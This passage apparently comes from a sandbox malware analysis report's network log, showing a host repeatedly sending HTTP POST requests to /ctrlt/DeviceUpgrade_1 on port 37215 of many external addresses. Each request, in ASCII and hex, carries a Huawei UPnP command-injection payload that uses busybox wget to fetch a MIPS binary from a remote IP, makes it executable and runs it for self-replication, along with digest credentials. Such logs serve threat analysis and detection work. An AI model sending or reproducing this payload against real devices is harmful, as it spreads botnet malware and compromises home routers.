                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    93192.168.2.1435346197.202.196.18337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.162688017 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.496478081 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    94192.168.2.145113674.101.176.18437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.165580988 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.508522034 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    95192.168.2.1457684157.72.125.1037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.165580988 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.508522034 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    96192.168.2.1438606157.155.92.14537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.165821075 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.567409992 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    97192.168.2.1456846157.102.180.13937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.165821075 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.571605921 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    98192.168.2.144376417.179.142.7837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.165821075 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
